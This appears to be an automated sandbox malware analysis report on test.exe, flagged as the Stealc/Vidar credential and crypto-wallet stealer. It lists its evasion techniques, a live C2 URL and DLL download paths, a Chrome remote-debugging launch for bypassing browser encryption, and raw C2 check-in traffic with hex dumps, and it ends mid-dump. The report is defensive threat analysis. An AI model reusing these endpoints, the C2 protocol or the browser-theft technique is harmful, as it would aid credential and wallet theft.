
Windows Analysis Report
test.exe

Overview

General Information

Sample name: test.exe
Analysis ID: 1633117
MD5: e4e0140934b3661ae96f53b7face5b44
SHA1: 284f1305ac3fee0545cf62a4303eac8a888f16a8
SHA256: c38a2d4032e4c1bc63e92b2ac0569f5454ea4a22f586a7832f985886308f1415
Tags: exe, user-BastianHein

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • test.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\test.exe" MD5: E4E0140934B3661AE96F53B7FACE5B44)
    • chrome.exe (PID: 8076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 7436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2288,i,7698725374925482900,7061072673800453571,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2320 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA software and the Tor Browser.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://45.93.20.28/85a1cacf11314eb8.php"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1455667853.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1168966295.0000000005420000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: test.exe PID: 7748 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security
Process Memory Space: test.exe PID: 7748 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\test.exe", ParentImage: C:\Users\user\Desktop\test.exe, ParentProcessId: 7748, ParentProcessName: test.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 8076, ProcessName: chrome.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-09T22:03:15.510443+0100 | 2044245 | 1 | Malware Command and Control Activity Detected | 45.93.20.28 | 80 | 192.168.2.4 | 49717 | TCP
2025-03-09T22:03:15.503668+0100 | 2044244 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:15.724339+0100 | 2044246 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:16.885183+0100 | 2044248 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:15.731526+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 45.93.20.28 | 80 | 192.168.2.4 | 49717 | TCP
2025-03-09T22:03:15.278982+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:17.687350+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49717 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:32.232344+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:33.244289+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:33.872322+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:34.432963+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:36.134484+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 45.93.20.28 | 80 | TCP
2025-03-09T22:03:36.685364+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 45.93.20.28 | 80 | TCP


AV Detection

Source: test.exe | Avira: detected
Source: http://45.93.20.28/85a1cacf11314eb8.phpexodus.conf.jsonni | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/softokn3.dlly | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpCash | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dllE | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllllz | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpJ | Avira URL Cloud: Label: malware
Source: http://45.93.20.28 | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/sqlite3.dllBg | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/ | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll# | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dll; | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpc_qt | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dllK | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpStar | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.php) | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dll6 | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll1 | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phps | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/freebl3.dll | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/softokn3.dll5 | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dll_ | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/mozglue.dlld | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dll | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpJ: | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/softokn3.dll | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/softokn3.dllQ | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpb: | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllowser | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.php | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllata | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpdge | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpd | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/mozglue.dllXgl | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/85a1cacf11314eb8.phpk | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/mozglue.dll | Avira URL Cloud: Label: malware
Source: http://45.93.20.28/c66c0eade263c9a8/nss3.dllll | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://45.93.20.28/85a1cacf11314eb8.php"}
Source: test.exe | ReversingLabs: Detection: 60%
Source: test.exe | Virustotal: Detection: 64%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\test.exe | Code function: 0_2_6CCC6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6CCC6C80
Source: test.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: Binary string: mozglue.pdbP | source: test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb | source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp | source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ | source: test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ | source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb | source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb | source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb | source: test.exe, 00000000.00000002.1471186025.000000006CEEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb | source: test.exe, 00000000.00000002.1470973984.000000006CD2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb | source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\test.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: chrome.exe | Memory has grown: Private usage: 0MB later: 40MB

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49717 -> 45.93.20.28:80
Source: Network traffic | Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49717 -> 45.93.20.28:80
Source: Network traffic | Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.93.20.28:80 -> 192.168.2.4:49717
Source: Network traffic | Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49717 -> 45.93.20.28:80
Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.93.20.28:80 -> 192.168.2.4:49717
Source: Network traffic | Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49717 -> 45.93.20.28:80
Source: Malware configuration extractor | URLs: http://45.93.20.28/85a1cacf11314eb8.php
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Sun, 09 Mar 2025 21:03:17 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT; ETag: "10e436-5e7eeebed8d80"; Accept-Ranges: bytes; Content-Length: 1106998; Content-Type: application/x-msdos-program; Data Raw: [raw hex dump of the PE response body omitted]
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Sun, 09 Mar 2025 21:03:32 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "a7550-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 685392; Content-Type: application/x-msdos-program; Data Raw: [raw hex dump of the PE response body omitted]
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Sun, 09 Mar 2025 21:03:33 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "94750-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 608080; Content-Type: application/x-msdos-program; Data Raw: [raw hex dump of the PE response body omitted]
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Sun, 09 Mar 2025 21:03:33 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "6dde8-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 450024; Content-Type: application/x-msdos-program; Data Raw: [raw hex dump of the PE response body omitted]
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Sun, 09 Mar 2025 21:03:34 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "1f3950-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 2046288; Content-Type: application/x-msdos-program; Data Raw: [raw hex dump of the PE response body omitted]
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK; Date: Sun, 09 Mar 2025 21:03:36 GMT; Server: Apache/2.4.41 (Ubuntu); Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT; ETag: "3ef50-5e7ebd4425100"; Accept-Ranges: bytes; Content-Length: 257872; Content-Type: application/x-msdos-program; Data Raw: [raw hex dump of the PE response body omitted]
00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 09 Mar 2025 21:03:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 
00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 45.93.20.28 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBF | Host: 45.93.20.28 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 36 34 42 32 30 32 35 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 75 6d 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a | Data Ascii: ------KFHJJJKKFHIDAAKFBFBF | Content-Disposition: form-data; name="hwid" | 58E64B20250F807656615 | ------KFHJJJKKFHIDAAKFBFBF | Content-Disposition: form-data; name="build" | trump | ------KFHJJJKKFHIDAAKFBFBF--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKK | Host: 45.93.20.28 | Content-Length: 268 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 4b 2d 2d 0d 0a | Data Ascii: ------GIEGHJEGHJKFIEBFHJKK | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------GIEGHJEGHJKFIEBFHJKK | Content-Disposition: form-data; name="message" | browsers | ------GIEGHJEGHJKFIEBFHJKK--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB | Host: 45.93.20.28 | Content-Length: 267 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 